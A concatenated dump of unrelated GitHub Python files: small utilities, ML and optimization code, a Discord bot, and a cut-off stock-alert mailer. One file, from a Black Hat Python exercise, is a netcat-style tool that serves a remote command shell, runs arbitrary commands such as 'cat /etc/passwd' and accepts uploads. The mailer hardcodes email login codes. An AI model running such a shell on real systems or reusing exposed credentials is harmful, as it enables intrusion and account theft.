logging.getLogger(__name__)\nlogging.basicConfig(format='%(levelname)s:%(name)s:%(asctime)s: %(message)s')\nlogger.setLevel(logging.INFO)\nlogging.debug(\"Done loading logging\")\n\n\nclass IntTracker:\n def __init__(self, n_track):\n self.n_track = n_track\n self.queue = []\n self.counter = Counter()\n pass\n def process(self, array):\n for item in array:\n if item not in self.counter:\n self.counter[item] = 1\n else:\n self.counter[item] += 1\n if item not in self.queue:\n logger.debug(\"if item not in self.queue: {}\".format(self.queue))\n self.queue.append(item)\n logger.debug(\"queue append: {}\".format(self.queue))\n self.queue.sort()\n if len(self.queue) > 5:\n removed_items = self.queue[:-5]\n for removed_item in removed_items:\n del self.counter[removed_item]\n self.queue = self.queue[-5:]\n logger.debug(\"queue: {}\".format(self.queue))\n return self.queue\n","repo_name":"clayrichardson/213bc673-eea4-4972-98bb-35af9ba9ffce","sub_path":"lib/int_tracker.py","file_name":"int_tracker.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25791328237","text":"from __future__ import print_function\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nD = 5\n\n# model = LSTMCell.train(X, y)\n# model.predict(X) # -> y\n\ndef learn(py):\n lstm = nn.LSTMCell(10, 10)\n matrix = py.reshape(10, 10)\n tensor = torch.from_numpy(matrix)\n input = Variable(tensor.double())\n # print(input[0])\n # input = Variable(torch.randn(6, 3, 10))\n hidden = Variable(torch.randn(3, 10).double())\n cell = Variable(torch.randn(3, 10).double())\n output = []\n for i, input_t in enumerate(input.chunk(input.size(1), dim=1)):\n hidden, cell = lstm(input_t, (hidden, cell))\n output.append(hidden)\n return output\n\ndef predict(px):\n return np.sin(px / D)\n\ndef run():\n x = np.array(range(100))\n y = np.sin(x / D)\n px = x[-1] + np.array(range(100))\n py = predict(px)\n# MAT PLOT\n plt.scatter(x, y)\n plt.scatter(px, py, c='r')\n plt.show()\n\nx = np.array(range(100))\nlearn(x)\n","repo_name":"arcoyk/LSTM","sub_path":"time_sequence_prediction/LSTMCell.py","file_name":"LSTMCell.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32411950700","text":"# Calculates the factorial of num\ndef factorial(num):\n product = 1\n for n in range(2, num + 1):\n product *= n\n return product\n\nnumber = int(input('Skriv ett tal: '))\n\nprint(f'{number}! = {factorial(number)}')\n ","repo_name":"pacive/DI2006","sub_path":"11_as2/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73421503148","text":"#basic calculator v.2.1 - created by cryptomancery spring 2021\n#create variable for add\ndef add():\n while true:\n print(x + y)\n#create a variable for subtract\ndef subtract():\n while true:\n print(x - y)\n#create a variable for multiply\ndef multiply():\n while true:\n print(x * y)\n#create a variable for divide\ndef divide():\n while true:\n print(x // y)\n \n#create a variable for arithmetic\nfoo = add, subtract, multiply, divide\n#create and integer variable for x\nx = 0\n#create an integer variable for y\ny = 0\n\n#ask the user which form of arithmetic\nfoo = input(\"Lowercase only. Add, subtract, multiply, or divide? \")\n#ask the user \"X: \" and put answer in x\nx = input(\"X: \")\n#ask the user \"Y: \" and put answer in y\ny = input(\"Y: \")\n\n#convert x to integer\nx = int(x)\n#convert y to integer\ny = int(y)\n\n#if add\nif foo == 'add':\n print(x + y)\n#if subtract\nif foo == 'subtract':\n print(x - y)\n#if multiply\nif foo == 'multiply':\n print(x * y)\n#if divide\nif foo =='divide':\n print(x // y)\n\n","repo_name":"cryptomancery/Simple-Python-Calculator","sub_path":"PyCalculator.py","file_name":"PyCalculator.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12408400609","text":"import pygame\nfrom constants import *\n\nclass SelectionRect(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n self.start_pos = (0, 0)\n self.image = pygame.Surface((0, 0))\n self.rect = self.image.get_rect()\n\n def update(self, start_pos, end_pos):\n self.start_pos = start_pos\n self.image = pygame.Surface((WIDTH_RATIO * abs(end_pos[0] - start_pos[0]), HEIGHT_RATIO * abs(end_pos[1] - start_pos[1])))\n self.rect = self.image.get_rect()\n self.rect.x = WIDTH_RATIO * min(start_pos[0], end_pos[0])\n self.rect.y = HEIGHT_RATIO * min(start_pos[1], end_pos[1])\n\n def update_end_pos(self, end_pos):\n self.update(self.start_pos, end_pos)\n","repo_name":"Aurigami/rts","sub_path":"SelectionRect.py","file_name":"SelectionRect.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10410101821","text":"import logging\nfrom typing import Callable, Iterable, Union\nfrom warnings import warn\n\nfrom ..engine import Engine, SingleCoreEngine\nfrom ..history import HistoryOptions\nfrom ..problem import Problem\nfrom ..result import Result\nfrom ..startpoint import StartpointMethod, to_startpoint_method, uniform\nfrom ..store import autosave\nfrom .optimizer import Optimizer, ScipyOptimizer\nfrom .options import OptimizeOptions\nfrom .task import OptimizerTask\nfrom .util import (\n assign_ids,\n bound_n_starts_from_env,\n postprocess_hdf5_history,\n preprocess_hdf5_history,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef minimize(\n problem: Problem,\n optimizer: Optimizer = None,\n n_starts: int = 100,\n ids: Iterable[str] = None,\n startpoint_method: Union[StartpointMethod, Callable, bool] = None,\n result: Result = None,\n engine: Engine = None,\n progress_bar: bool = True,\n options: OptimizeOptions = None,\n history_options: HistoryOptions = None,\n filename: Union[str, Callable, None] = None,\n overwrite: bool = False,\n) -> Result:\n \"\"\"\n Do multistart optimization.\n\n Parameters\n ----------\n problem:\n The problem to be solved.\n optimizer:\n The optimizer to be used n_starts times.\n n_starts:\n Number of starts of the optimizer.\n ids:\n Ids assigned to the startpoints.\n startpoint_method:\n Method for how to choose start points. False means the optimizer does\n not require start points, e.g. for the 'PyswarmOptimizer'.\n **Deprecated. Use ``problem.startpoint_method`` instead.**\n result:\n A result object to append the optimization results to. For example,\n one might append more runs to a previous optimization. If None,\n a new object is created.\n engine:\n Parallelization engine. Defaults to sequential execution on a\n SingleCoreEngine.\n progress_bar:\n Whether to display a progress bar.\n options:\n Various options applied to the multistart optimization.\n history_options:\n Optimizer history options.\n filename:\n Name of the hdf5 file, where the result will be saved. Default is\n None, which deactivates automatic saving. If set to\n \"Auto\" it will automatically generate a file named\n `year_month_day_profiling_result.hdf5`.\n Optionally a method, see docs for `pypesto.store.auto.autosave`.\n overwrite:\n Whether to overwrite `result/optimization` in the autosave file\n if it already exists.\n\n Returns\n -------\n result:\n Result object containing the results of all multistarts in\n `result.optimize_result`.\n \"\"\"\n # optimizer\n if optimizer is None:\n optimizer = ScipyOptimizer()\n\n # number of starts\n n_starts = bound_n_starts_from_env(n_starts)\n\n # startpoint method\n if startpoint_method is None:\n if problem.startpoint_method is None:\n startpoint_method = uniform\n else:\n startpoint_method = problem.startpoint_method\n else:\n warn(\n \"Passing `startpoint_method` directly is deprecated, use `problem.startpoint_method` instead.\",\n DeprecationWarning,\n )\n\n # convert startpoint method to class instance\n startpoint_method = to_startpoint_method(startpoint_method)\n\n # check options\n if options is None:\n options = OptimizeOptions()\n options = OptimizeOptions.assert_instance(options)\n\n # history options\n if history_options is None:\n history_options = HistoryOptions()\n history_options = HistoryOptions.assert_instance(history_options)\n\n # assign startpoints\n startpoints = startpoint_method(\n n_starts=n_starts,\n problem=problem,\n )\n\n ids = assign_ids(\n n_starts=n_starts,\n ids=ids,\n result=result,\n )\n\n # prepare result\n if result is None:\n result = Result(problem)\n\n # engine\n if engine is None:\n engine = SingleCoreEngine()\n\n # change to one hdf5 storage file per start if parallel and if hdf5\n history_file = history_options.storage_file\n history_requires_postprocessing = preprocess_hdf5_history(\n history_options, engine\n )\n\n # define tasks\n tasks = []\n for startpoint, id in zip(startpoints, ids):\n task = OptimizerTask(\n optimizer=optimizer,\n problem=problem,\n x0=startpoint,\n id=id,\n history_options=history_options,\n optimize_options=options,\n )\n tasks.append(task)\n\n # perform multistart optimization\n ret = engine.execute(tasks, progress_bar=progress_bar)\n\n # merge hdf5 history files\n if history_requires_postprocessing:\n postprocess_hdf5_history(ret, history_file, history_options)\n\n # aggregate results\n for optimizer_result in ret:\n result.optimize_result.append(optimizer_result)\n\n # sort by best fval\n result.optimize_result.sort()\n\n # if history file provided, set storage file to that one\n if filename == \"Auto\" and history_file is not None:\n filename = history_file\n autosave(\n filename=filename,\n result=result,\n store_type=\"optimize\",\n overwrite=overwrite,\n )\n\n return result\n","repo_name":"ICB-DCM/pyPESTO","sub_path":"pypesto/optimize/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"37"} +{"seq_id":"1366714568","text":"import discord\r\nfrom discord.ext import commands\r\nimport youtube_dl\r\nimport nacl\r\nimport ffmpeg\r\n\r\nclass music(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.command()\r\n async def play(self, ctx, *url):\r\n #If no author, send warning\r\n if ctx.author.voice is None:\r\n await ctx.send(\"T'es pas dans un channel\")\r\n\r\n #Store the voice channel\r\n voice_channel = ctx.author.voice.channel\r\n\r\n #If bot is not in a voice channel, wait until connected\r\n #else move to the correct voice channel (switching channels)\r\n if ctx.voice_client is None:\r\n await voice_channel.connect()\r\n else:\r\n await ctx.voice_client.move_to(voice_channel)\r\n\r\n ctx.voice_client.stop()\r\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\r\n YDL_OPTIONS = {\"format\":\"bestaudio\"}\r\n vc = ctx.voice_client\r\n\r\n if \".com\" in url:\r\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\r\n info = ydl.extract_info(url, download=False)\r\n url2 = info['formats'][0]['url']\r\n source = await discord.FFmpegOpusAudio.from_probe(url2, executable=r\"C:###\\youtube-dl\\ffmpeg.exe\")\r\n await ctx.channel.send(\"Playing ton beat de merde\")\r\n vc.play(source)\r\n\r\n else:\r\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\r\n info = ydl.extract_info(f\"ytsearch:{url}\", download=False)\r\n print(info)\r\n print(info['entries'][0])\r\n urlx = info['entries'][0]\r\n url2 = urlx['formats'][0]['url']\r\n source = await discord.FFmpegOpusAudio.from_probe(url2,executable=r\"C:###\\youtube-dl\\ffmpeg.exe\")\r\n await ctx.channel.send(f\"Playing: {urlx['title']}\")\r\n vc.play(source)\r\n\r\n @commands.command()\r\n async def pause(self, ctx):\r\n ctx.voice_client.pause()\r\n await ctx.send(\"J'ai pause ton beat\")\r\n\r\n @commands.command()\r\n async def resume(self, ctx):\r\n ctx.voice_client.resume()\r\n await ctx.send(\"J'ai resume ton beat\")\r\n\r\n###################################################################################\r\n\r\ndef setup(client):\r\n client.add_cog(music(client))\r\n\r\n","repo_name":"haddad-github/DiscordBot-Public","sub_path":"cogs/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72510462186","text":"AUDIO_DIRECTORY = \"/home/root/fasit/sounds/\"\n\nimport fasit_audio\n\nfrom threading import BoundedSemaphore\nimport time\nimport os\nimport random\nimport logging\n\nfrom QThread import *\n\n#------------------------------------------------------------------------------\n#\n#------------------------------------------------------------------------------\nclass play_sound_thread(QThread): \n \"\"\"Class for playing sounds\n \"\"\" \n def __init__(self, number):\n QThread.__init__(self)\n logger_string = \"play_sound_thread\" + str(number)\n self.logger = logging.getLogger(logger_string)\n self.keep_going = True\n self.track_number = -1\n self.track_path = \"\"\n self.loop = 1\n self.random = False\n self.playing = False\n self.playing_semaphore = BoundedSemaphore(1)\n self.track_semaphore = BoundedSemaphore(1)\n self.audio = fasit_audio.FasitAudio()\n self.start()\n\n def get_track(self):\n self.track_semaphore.acquire()\n path = self.track_path\n self.track_semaphore.release() \n return path\n\n def set_track(self, path):\n self.track_semaphore.acquire()\n self.track_path = path\n self.track_semaphore.release() \n \n def is_playing(self):\n self.playing_semaphore.acquire()\n playing = self.playing\n self.playing_semaphore.release() \n return playing\n \n def set_playing(self, playing):\n self.playing_semaphore.acquire()\n self.playing = playing\n self.playing_semaphore.release() \n \n def record_track(self, track_number):\n if (self.is_playing() == True):\n self.logger.debug(\"Can't record track, player is currently playing.\")\n return False\n if ((track_number < 0) or (track_number > 62)):\n self.logger.debug('Track number out of range [0 - 62]: %d', track_number)\n return False\n \n self.set_track(AUDIO_DIRECTORY+str(track_number)+\".mp3\")\n if (os.path.isfile(self.get_track()) == True):\n self.logger.debug('Recording file %s', self.get_track())\n self.set_playing(True)\n self.track_number = track_number\n self.loop = 0\n self.random = False\n if (self.random == True):\n self.loop = 1\n self.write(\"record\")\n return True\n else:\n self.logger.debug('Could not find file %s', self.get_track())\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n return False\n\n def play_track(self, track_number, loop = 1, random = False):\n if (self.is_playing() == True):\n self.logger.debug(\"Can't play track, player is currently playing.\")\n return False\n if ((track_number < 0) or (track_number > 62)):\n self.logger.debug('Track number out of range [0 - 62]: %d', track_number)\n return False\n if ((loop < 0) or (loop > 255)):\n self.logger.debug('loop out of range [0 - 255]: %d', loop)\n return False\n if ((random != True) and (random != False)):\n self.logger.debug('random out of range [True or False]: %d', random)\n return False\n \n self.set_track(AUDIO_DIRECTORY+str(track_number)+\".mp3\")\n if (os.path.isfile(self.get_track()) == True):\n self.logger.debug('Playing file %s', self.get_track())\n self.set_playing(True)\n self.track_number = track_number\n self.loop = loop\n self.random = random\n if (self.random == True):\n self.loop = 1\n self.write(\"play\")\n return True\n else:\n self.logger.debug('Could not find file %s', self.get_track())\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n return False\n \n def run(self):\n self.logger.debug('Starting audio thread...')\n while (self.keep_going == True):\n data = self.read_in()\n #self.logger.debug('Going with %s and %s', `data`, self.get_track())\n if (data == \"play\"):\n path = self.get_track()\n if (path != \"\"):\n self.audio.play(path, self.loop)\n if(self.audio.poll() == True):\n self.logger.debug('Track has stopped playing: %s', path)\n if (self.random == True):\n wait = random.randint(1, 10)\n time.sleep(wait)\n self.audio.play(path, self.loop)\n else:\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n if (data == \"record\"):\n path = self.get_track()\n if (path != \"\"):\n self.audio.record(path)\n self.logger.debug('Track has stopped recording: %s', path)\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n elif data == \"stop_play\":\n self.random = False\n self.audio.stop()\n elif data == \"stop\":\n self.keep_going = False\n time.sleep(0.5)\n self.set_playing(False)\n\n\n","repo_name":"fishybell/ATIatm","sub_path":"open_embedded_stable_ati/oe_at91sam/recipes/ati2/files/fasit/play_sound_thread.py","file_name":"play_sound_thread.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5899181642","text":"# Black Hat Python page 13\n# Replacing Netcat - BHP Net Tool\n\nimport getopt\nimport socket\nimport subprocess\nimport sys\nimport threading\n\n# global variables\nlisten = False\ncommand = False # True if server is executing a command shell\nupload = False\nexecute = \"\"\ntarget = \"\"\nupload_destination = \"\"\nport = 0\n\n\n# TODO convert to argparse instead of getopt\ndef usage():\n print(\"BHP Net Tool\")\n print()\n print(\"Usage: bhpnet.py -t target_host -p port\")\n print(\"-l --listen\t\t\t\t- listen on [host]:[port] for incoming connections\")\n print(\"-e --execute=file_to_run - execute the given file upon receiving a connection\")\n print(\"-c --command\t\t\t\t- initialize a command shell\")\n print(\"-u --upload=destination\t- upon receiving connection upload a file and write to [destination]\")\n print()\n print()\n print(\"Examples:\")\n print(\"bhpnet.py -t 192.168.0.1 -p 5555 -l -c\")\n print(\"bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\\\target.exe\")\n print(\"bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\\\"cat /etc/passwd\\\"\")\n print(\"echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135\")\n sys.exit(0)\n\n\ndef client_sender(buffer):\n print(\"[*] Creating socket\")\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"[*] Socket created\")\n\n try:\n # connect to target host\n client.connect((target, port))\n\n print(\"[*] Client connected\")\n\n if len(buffer) and not command:\n client.sendall(buffer.encode('utf-8')) # TODO send or sendall?\n print(\" Sent an initial buffer in client_sender:\", buffer, \" Length is:\", len(buffer))\n\n\n\n while True:\n\n # wait for data back\n recv_len = 1\n response = \"\"\n\n while recv_len:\n\n print(\" Receiving data.\")\n data = client.recv(4096).decode('utf-8')\n # data2 = client.recv(4096).decode('utf-8')\n # print(\" data:\", data)\n # print(\" data2:\", data2)\n\n recv_len = len(data)\n # recv_len = len(data) + len(data2)\n response += data\n # response += data2\n # print(\" response:\", response)\n\n if recv_len < 4096:\n # print(\" Breaking out of recv loop. recv_len:\", recv_len)\n break\n\n\n\n # print(\" Printing response and reading from stdin.\")\n print(response, end='') # remove the \\n that print() adds\n\n # wait for more input\n buffer = input(\"\") # was raw_input() in Python 2 TODO this acts weird...\n # buffer = sys.stdin.readline() # includes a '\\n' at the end\n # TODO needed?: buffer += \"\\n\"\n buffer += \"\\n\"\n\n # send it off\n # print(\" client.send\")\n client.sendall(buffer.encode('utf-8')) # TODO send or sendall?\n\n except Exception as e:\n print(\"[*] Exception! Exiting.\", e)\n client.close()\n\n\ndef server_loop():\n global target\n\n # if no target is defined, listen on all interfaces\n if not len(target):\n target = \"0.0.0.0\"\n\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((target, port))\n server.listen(5)\n\n while True:\n print(\"[*] Server listening\")\n client_socket, addr = server.accept()\n print(\"[*] Client connected\")\n\n # spin off thread to handle client\n client_thread = threading.Thread(target=client_handler, args=(client_socket,))\n client_thread.start()\n\n # print(\"[*] Client handler thread started\") # prints after the thread prints...\n\n\ndef run_command(command):\n # trim newline\n command = command.rstrip()\n\n # run the command and get output back\n try:\n output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)\n except:\n output = \"Failed to execute the command.\\r\\n\"\n\n return output\n\n\ndef client_handler(client_socket):\n global upload\n global execute\n global command\n\n print(' Starting client_handler')\n\n # check for upload\n if len(upload_destination):\n # read in all of the bytes and write to our destination\n file_buffer = \"\"\n\n # keep reading data until none is available\n while True:\n print(' Handling upload. Waiting on socket recv...')\n data = client_socket.recv(1024).decode('utf-8')\n\n if not data:\n print(' Handling upload. No data, breaking out of recv loop.')\n break\n else:\n file_buffer += data\n\n try:\n file_descriptor = open(upload_destination, \"wb\")\n file_descriptor.write(file_buffer)\n file_descriptor.close()\n\n\n\n # acknowledge that we wrote the file out\n print(\" client_socket.send\")\n client_socket.sendall((\"Successfully saved file to %s\\r\\n\" % upload_destination).encode('utf-8'))\n\n except:\n print(\" client_socket.send - Failed to save file\")\n client_socket.sendall((\"Failed to save file to %s\\r\\n\" % upload_destination).encode('utf-8'))\n\n if len(execute):\n # run the command\n output = run_command(execute)\n\n print(\" client_socket.send\")\n client_socket.sendall(output.encode('utf-8')) # TODO send or sendall?\n\n if command:\n print(\" Seeding command loop with prompt sendall\")\n client_socket.sendall(\" \".encode('utf-8')) # TODO Added here to 'seed' loop. send or sendall?\n while True:\n print(\" In command loop.\") # Sending prompt.\")\n # show simple command prompt\n # client_socket.sendall(\" \".encode('utf-8')) # TODO send or sendall?\n\n # receive until we see a linefeed\n cmd_buffer = \"\"\n while \"\\n\" not in cmd_buffer:\n print(\" Looping client_socket.recv until \\\\n found\")\n len_before = len(cmd_buffer)\n cmd_buffer += client_socket.recv(1024).decode('utf-8')\n print(cmd_buffer)\n\n if len_before == len(cmd_buffer):\n print(\" No more data. Connection is broken. Ending thread by returning.\")\n return\n\n # send back the command output\n response = run_command(cmd_buffer)\n\n if not response:\n response = \"\".encode('utf-8') # or = b''?\n\n # TODO test the string encoding... sometimes the response is bytes or str\n # fixed the type test by using type()\n if type(response) is str:\n # client_socket.re\n response = response.encode('utf-8')\n print(\"Response, length, type\")\n print(response)\n print(len(response))\n print(type(response))\n\n if type(response) is not bytes:\n print('response is still not bytes... wtf?!?!?!')\n print('fixing it')\n response = b''\n\n # send back the response\n print(\" Sending response.\")\n client_socket.sendall(response + \" \".encode('utf-8')) # TODO send or sendall?\n\n # TODO Adding handler for stdin/stdout... why is this not already included? telnet-like functionality\n\n # while True:\n # print(' Handling stdout.')\n #\n # # wait for data back\n # recv_len = 1\n # response = \"\"\n #\n # while recv_len:\n #\n # print(\" Receiving data.\")\n # data = client_socket.recv(4096).decode('utf-8')\n # recv_len = len(data)\n # response += data\n #\n # if recv_len < 4096:\n # break\n # print(\"\")\n # print(response)\n #\n # # wait for more input\n # print(' waiting on stdin.')\n # # buffer = input(\"\") # was raw_input() in Python 2 TODO this acts weird...\n # buffer = sys.stdin.readline() # TODO read or readline\n # # TODO needed?: buffer += \"\\n\"\n #\n # print(' Sending input.')\n # # send it off\n # client_socket.send(buffer.encode('utf-8'))\n #\n # print(' Exiting client_handler')\n\n\n# TODO refactor to remove global variables\ndef main():\n global listen\n global port\n global execute\n global command\n global upload_destination\n global target\n\n if not len(sys.argv[1:]):\n usage()\n\n # read the commandline options\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hle:t:p:cu:\",\n [\"help\", \"listen\", \"execute\", \"target\", \"port\", \"command\", \"upload\"])\n except getopt.GetoptError as err:\n print(str(err))\n return\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n usage()\n elif o in (\"-l\", \"--listen\"):\n listen = True\n elif o in (\"-e\", \"--execute\"):\n execute = a\n elif o in (\"-c\", \"--commandshell\"):\n print(' Running as command shell.')\n command = True\n elif o in (\"-u\", \"--upload\"):\n upload_destination = a\n elif o in (\"-t\", \"--target\"):\n target = a\n elif o in (\"-p\", \"--port\"):\n port = int(a)\n else:\n raise Exception(\"Unhandled option\")\n\n # are we going to listen or just send data from stdin?\n if not listen and len(target) and port > 0:\n print(\"[*] Beginning client, reading stdin.\")\n\n # read in the buffer from the command line\n # this will block, send EOF (Ctrl-d on Linux, Ctrl-z on Windows)\n # if not sending input to stdin\n # TODO really needed? causes extra input when connecting to bhpnet command server.\n # buffer = sys.stdin.read() # TODO should it be read (original) or readline (with '\\n')?\n # buffer = input()\n buffer = ''\n\n # send data off\n print(\"[*] Starting client_sender with stdin buffer.\")\n client_sender(buffer)\n\n # listen and potentially upload, execute commands or drop a shell back\n # depending on command line options\n elif listen:\n server_loop()\n\n else:\n raise Exception(\"Invalid option\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"benhunter/py-stuff","sub_path":"bhp/bhpnet.py","file_name":"bhpnet.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19672799338","text":"from evdev import InputDevice, categorize, ecodes\nimport math\nimport numpy as np\nimport time\ndevice1 = InputDevice('/dev/input/event0')\ndevice2 = InputDevice('/dev/input/event3')\n\n\n# 2 has to be right, 1 has to be left.\n\ndpcy1 = 1945.39008\ndpcy2 = 2021.565\ndpcx1 = 1963.033\ndpcx2 = 2024.287\nX, Y , Theta = 0,0,0\nD = 8.1\ncount = 0\nmax_mov = 0\ntime_mean = 0\n\ntime_list = []\n\ntry:\n while True:\n s = time.time()\n count += 1\n \n event1 = device1.read_one()\n event2 = device2.read_one()\n x1_d, y1_d = 0, 0\n x2_d, y2_d = 0, 0\n if event1 is not None:\n if event1.type == ecodes.EV_REL:\n if event1.code == ecodes.REL_X:\n x1_d = event1.value\n elif event1.code == ecodes.REL_Y:\n y1_d = -event1.value\n if event2 is not None:\n if event2.type == ecodes.EV_REL:\n if event2.code == ecodes.REL_X:\n x2_d = event2.value\n elif event2.code == ecodes.REL_Y:\n y2_d = -event2.value\n \n max_mov = max(x1_d, y1_d, x2_d, y2_d,max_mov)\n #Converting to centimeters for First mouse\n x1_c = x1_d/dpcx1\n y1_c = y1_d/dpcy1\n \n #Converting to centimeters for Second mouse\n x2_c = x2_d/dpcx2\n y2_c = y2_d/dpcy2\n \n delta_x = (x1_c+x2_c)/2\n delta_y = (y1_c+y2_c)/2\n \n delta_theta = math.atan2(y1_c - y2_c, x1_c - x2_c + D)\n Theta += delta_theta\n \n delta_x_global = math.cos(Theta)*delta_x - math.sin(Theta)*delta_y\n delta_y_global = math.sin(Theta)*delta_x + math.cos(Theta)*delta_y\n \n X += delta_x_global\n Y += delta_y_global\n e = time.time()\n time_mean += (e-s)\n time_list.append(e-s)\n \n if count%50000==0:\n print(\"C:%d, X:%f, Y:%f, Theta:%f\\n\"%(count/50000 ,X, Y,math.degrees(Theta)))\n #print(\"x1d:%d, y1d:%f, x2d:%f, y2d:%f\\n\"%(x1_d, y1_d, x2_d, y2_d))\n #print(\"Maximum Movement:\",max_mov)\n #print(\"Standard Deviation:\", np.std(time_list))\n #print(\"Average time:\",time_mean/count)\n \n \n\nexcept KeyboardInterrupt:\n \n device1.close()\n device2.close()\n \n \n \n","repo_name":"PranavAdlinge/DeadReckoning","sub_path":"dr.py","file_name":"dr.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24360756651","text":"\n\"\"\"\n백준 온라인저지 (boj.kr)\n10866 덱\n정수를 저장하는 덱(Deque)를 구현한 다음, 입력으로 주어지는 명령을 처리하는 프로그램을 작성하시오.\n\n명령은 총 여덟 가지이다.\n\npush_front X: 정수 X를 덱의 앞에 넣는다.\npush_back X: 정수 X를 덱의 뒤에 넣는다.\npop_front: 덱의 가장 앞에 있는 수를 빼고, 그 수를 출력한다. 만약, 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\npop_back: 덱의 가장 뒤에 있는 수를 빼고, 그 수를 출력한다. 만약, 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\nsize: 덱에 들어있는 정수의 개수를 출력한다.\nempty: 덱이 비어있으면 1을, 아니면 0을 출력한다.\nfront: 덱의 가장 앞에 있는 정수를 출력한다. 만약 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\nback: 덱의 가장 뒤에 있는 정수를 출력한다. 만약 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\n\n\"\"\"\nfrom collections import deque\nimport sys\n\ncase = int(sys.stdin.readline().rstrip())\ncmdlist = []\nfor c in range(case) :\n cmdlist.append(sys.stdin.readline().rstrip())\n\nd = deque()\nfor idx,acmd in enumerate(cmdlist) :\n cmd = acmd.split(' ');\n if cmd[0] == 'push_back' :\n d.append(int(cmd[1]))\n elif cmd[0] == 'push_front' :\n d.appendleft(int(cmd[1]))\n elif cmd[0] == 'pop_back' :\n if d : print(d.pop())\n else : print(-1)\n elif cmd[0] == 'pop_front' :\n if d : print(d.popleft())\n else : print(-1) \n elif cmd[0] == 'front' :\n if d : print(d[0])\n else : print(-1)\n elif cmd[0] == 'back' :\n if d : print(d[-1])\n else : print(-1)\n elif cmd[0] == 'size' :\n print(len(d))\n elif cmd[0] == 'empty' :\n if len(d) == 0 : print(1)\n else : print(0)","repo_name":"csw180/coding_py","sub_path":"boj_10866.py","file_name":"boj_10866.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20621196495","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport random\nimport pandas as pd\nimport smtplib\nimport easyquotation\nimport datetime\nimport time\nfrom email.mime.text import MIMEText\nfrom pytdx.hq import TdxHq_API\nfrom email.header import Header\nimport traceback\napi = TdxHq_API(auto_retry=True)\nfrom util.TransBaseData import main\n#全局变量\ndict_code_ma = dict()\ndict_code_last_close = dict()\n\n#刷新本地数据\n#main()\n\n#存储已发送过股票的邮件次数\nsend_email_times = dict()\n\ndef get_format_day(numdays=0,sep = \"-\"):\n now = datetime.datetime.now()\n delta = datetime.timedelta(days=numdays)\n n_days = now + delta\n return n_days.strftime(\"%Y{}%m{}%d\".format(sep, sep))\n\ndef send_email(subject, text):\n mail_host = \"smtp.qq.com\" # 设置的邮件服务器host必须是发送邮箱的服务器,与接收邮箱无关。\n # mail_user = \"535085264@qq.com\" # qq邮箱登陆名\n # mail_pass = \"qkjncuveufokcbea\" # 开启stmp服务的时候并设置的授权码,注意!不是QQ密码。\n # sender = '535085264@qq.com' # 发送方qq邮箱\n # receivers = ['535085264@qq.com'] # 接收方qq邮箱\n qq_mail1 = \"535085264@qq.com\"\n mail_pass1 = \"qkjncuveufokcbea\"\n qq_mail2 = \"1328660440@qq.com\"\n mail_pass2 = \"tejexorxzankjgba\"\n mail_config_list = [(qq_mail1, mail_pass1, qq_mail1, qq_mail1), (qq_mail2, mail_pass2, qq_mail2, qq_mail2)]\n mail_user, mail_pass, sender, receivers = random.sample(mail_config_list, k=1)[0]\n message = MIMEText(text, 'plain', 'utf-8')\n message['From'] = Header(\"hailong\", 'utf-8') # 设置显示在邮件里的发件人\n message['To'] = Header(\"wowo\", 'utf-8') # 设置显示在邮件里的收件人\n message['Subject'] 